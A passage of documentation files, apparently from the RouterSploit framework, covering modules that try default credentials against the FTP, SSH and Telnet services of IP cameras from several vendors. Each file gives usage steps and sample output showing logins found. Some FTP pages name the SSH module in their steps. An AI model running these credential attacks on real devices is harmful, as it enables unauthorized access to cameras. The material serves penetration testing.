[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/honeywell/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Honeywell Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/honeywell/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/honeywell/telnet_default_creds
rsf (Honeywell Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Honeywell Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/iqinvision/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against IQInvision Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/iqinvision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/iqinvision/ftp_default_creds
rsf (IQInvision Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IQInvision Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/iqinvision/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against IQInvision Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/iqinvision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/iqinvision/ssh_default_creds
rsf (IQInvision Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IQInvision Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/iqinvision/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against IQInvision Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/iqinvision/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/iqinvision/telnet_default_creds
rsf (IQInvision Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IQInvision Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/jvc/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against JVC Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/jvc/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/jvc/ftp_default_creds
rsf (JVC Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (JVC Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/jvc/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against JVC Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/jvc/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/jvc/ssh_default_creds
rsf (JVC Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (JVC Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/jvc/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against JVC Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/jvc/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/jvc/telnet_default_creds
rsf (JVC Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (JVC Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/mobotix/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Mobotix Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/mobotix/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/mobotix/ftp_default_creds
rsf (Mobotix Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mobotix Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/mobotix/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Mobotix Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/mobotix/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/mobotix/ssh_default_creds
rsf (Mobotix Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mobotix Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/mobotix/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Mobotix Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/mobotix/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/mobotix/telnet_default_creds
rsf (Mobotix Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mobotix Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/samsung/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Samsung Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/samsung/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/samsung/ftp_default_creds
rsf (Samsung Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Samsung Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/samsung/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Samsung Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/samsung/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/samsung/ssh_default_creds
rsf (Samsung Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Samsung Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/samsung/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Samsung Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/samsung/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/samsung/telnet_default_creds
rsf (Samsung Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Samsung Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/sentry360/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Sentry360 Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/sentry360/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/sentry360/ftp_default_creds
rsf (Sentry360 Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Sentry360 Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/sentry360/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Sentry360 Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/sentry360/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/sentry360/ssh_default_creds
rsf (Sentry360 Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Sentry360 Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/sentry360/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Sentry360 Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/sentry360/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/sentry360/telnet_default_creds
rsf (Sentry360 Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Sentry360 Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/siemens/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Siemens Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/siemens/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/siemens/ftp_default_creds
rsf (Siemens Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Siemens Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/siemens/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Siemens Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/siemens/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/siemens/ssh_default_creds
rsf (Siemens Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Siemens Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/siemens/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Siemens Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/siemens/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/siemens/telnet_default_creds
rsf (Siemens Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Siemens Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/speco/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Speco Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/speco/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/speco/ftp_default_creds
rsf (Speco Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Speco Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/speco/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Speco Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/speco/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/speco/ssh_default_creds
rsf (Speco Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Speco Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/speco/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Speco Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/speco/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/speco/telnet_default_creds
rsf (Speco Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Speco Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/stardot/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Stardot Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/stardot/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/stardot/ftp_default_creds
rsf (Stardot Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Stardot Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/stardot/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Stardot Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/stardot/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/stardot/ssh_default_creds
rsf (Stardot Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Stardot Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/stardot/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Stardot Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/stardot/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/stardot/telnet_default_creds
rsf (Stardot Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Stardot Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
